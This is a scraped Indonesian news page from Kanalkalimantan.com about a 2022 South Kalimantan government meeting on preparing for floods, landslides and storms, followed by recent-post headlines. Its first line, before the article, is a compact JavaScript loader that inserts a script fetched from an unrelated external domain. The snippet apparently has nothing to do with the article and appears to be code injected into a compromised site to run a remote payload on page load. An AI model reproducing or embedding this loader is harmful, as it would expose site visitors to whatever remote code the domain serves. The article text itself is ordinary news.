(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Pemprov Kalsel

Antisipasi Bencana Hidrometeorologi Pemprov Kalsel Gelar Rakor


KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Provinsi Kalimantan Selatan (Kalsel) menggelar rapat koordinasi (Rakor) antisipasi dan kesiapsiagaan bencana hidrometeorologi pada musim hujan dan penanggulangan bencana di gedung KH Idham Chalid, Setda Provinsi Kalsel, Selasa (1/11/2022).

Bencana hidrometeorologi yang dimaksud adalah hujan lebat yang berdampak banjir, tanah longsor, air rob dan angin kencang berakibat pohon tumbang.

Hidrometeorologi adalah cabang ilmu dari meteorologi yang mempelajari siklus air, curah hujan, dan berkaitan dengan iklim dan cuaca.

Kepala Badan Penanggulangan Bencana Dearah (BPBD) Kalsel, R Suria Fadliansyah mengatakan, dalam menghadapi bencana, BPBD Kalsel sudah melakukan berbagai upaya.

 

Baca juga : Tim Sepakbola Kalsel ke Final Pra Popnas, Tiket Popnas 2023 Dalam Genggaman

“Secara sosialisasi sudah jalan, sudah persiapan latihan baik relawan dan BPBD dari kabupaten/kota kita ajak bersama beberapa kali dalam kegiatan untuk persiapan dalam menghadapi bencana banjir, angin puting beliung dan tanah longsor,” katanya.

Dalam penanganannya kata Suria, akan berkoordinasi dengan stakeholder terkait baik kabupaten/kota maupun TNI/Polri. Bahkan, pihaknya juga menyiapkan baper stok.

“Baper stok ini untuk utamanya dalam bencana kesedian bahan makanan, yanh diserahkan hari ini kepada 13 kabupaten/kota,” ujarnya.

Dalam rakor ini, kata Suria, dibahas terkait kesiapsiagaan dalam menghadapi bencana, akan dibahas oleh beberapa stakeholder baik dari kabupaten/kota, TNI/Polri maupun BMKG terkait prakiraan cuaca kedepan.

“Semuanya akan tersimpulkan dalam rakor ini,” tambahnya.

Baca juga  : Dinkes Kalsel Bantah Kabar 3 Anak Meninggal Akibat Gangguan Gagal Ginjal Akut

Dibeberkannya daerah rawan bencana di Kalsel, ada beberapa titik wilayah seperti Hulu Sungai Tengah, Tanah Laut dan Tanah Bumbu.

“Beberapa kali kita terkena banjir, satu jam kemudian sudah teratasi semuanya, mereka (BPBD kabupaten/kota) selalu siap siaga dalam menghadapi bencana ini,” tuntasnya.

Sementara itu, Gubernur Kalsel melalui Sekda Provinsi Kalsel, Roy Rizali Anwar mengatakan dalam menghadapi bencana para pemangku kepentingan agar saling bekerjasama dan saling berkordinasi.

“Kita sudah tahu daerah mana saja yang rawan banjir, pastikan sarana dan prasarana dari pemberitahuan atau peringatan dini sampai sarana dan prasarana untuk mengurangi dampak banjir termasuk evakuasi sudah tersedia di masing-masing daerah yang rawan bencana,” katanya.

Menurutnya sistem peringatan dini tidak harus menggunakan teknologi, banyak media bisa dipakai, seperti pentungan, tiang listrik, media grup pesan singkat maupun lain sebagainya.

Baca juga  : ENERVON-C Dukung Penjaringan Atlet Muda Atletik dari Kalsel di Student Athletics Championships 2022

Disambung Roy, bencana tahun 2021 lalu menjadi pelajaran berharga agar lebih waspada dan memiliki respon cepat dalam menghadapi bencana.

“Manfaatkan dana APBD serta belanja tidak terduga yang dialokasikan khususnya saat keadaan darurat,” ujarnya.

Dirinya berpesan kepada desa-desa rawan bencana agar mengalokasikan APBD Desa untuk dimaksimalkan dalam penanganan bencana di daerahnya.

Ia menegaskan dalam penanganan bencana tidak hanya tanggung jawab pemerintah namun semua komponen masyarakat.

“Partisipasi masyarakat sangat dibutuhkan dalam mencegah dan mengurangi resiko terjadinya bencana,” tuntasnya.(Kanalkalimantan.com/ibnu)

Reporter  : ibnu
Editor : bie


Desy Arfianty

Recent Posts

Andoko Abdi Lamar Partai Sendiri, Putusan Pasangan Ada di DPP

KANALKALIMANTAN.COM, BANJARBARU - Satu kader Partai Demokrat Andoko Abdi menyerahkan berkas pencalonan Pemilihan Wali Kota… Read More

10 jam ago

Bawaslu HSU Melantik 30 Orang Anggota Panwascam

KANALKALIMANTAN.COM, AMUNTAI - Ketua Badan Pengawas Pemilu (Bawaslu) Hulu Sungai Utara (HSU) Marfa'i melantik dan… Read More

10 jam ago

15 Anggota Panwascam Dilantik, Bawaslu Banjarbaru langsung Berikan Bimtek Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilu (Bawaslu) Kota Banjarbaru resmi melantik 15 anggota Panitia Pengawas… Read More

12 jam ago

Pangkalan LPG Diminta Tak Bermain Harga, Polres Banjarmasin Bentuk Tim Khusus

KANALKALIMANTAN.COM, BANJARMASIN - Satuan Reserse Kriminal (Satreskrim) Polresta Banjarmasin membentuk tim khusus untuk mengatasi permasalaha… Read More

13 jam ago

Langsung Pakai Ihram, Kloter 10 Asal HSU-Banjar-Banjarmasin Terbang ke Tanah Suci

KANALKALIMANTAN.COM, BANJARBARU - Jemaah Haji Kabupaten Hulu Sungai Utara (HSU) yang tergabung dalam Kelompok Terbang… Read More

19 jam ago

Safari Jum’at Pj Bupati Kapuas di Masjid Baiturrahman Tamban Catur

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi melakukan Safari Jum’at di Masjid… Read More

21 jam ago

This website uses cookies.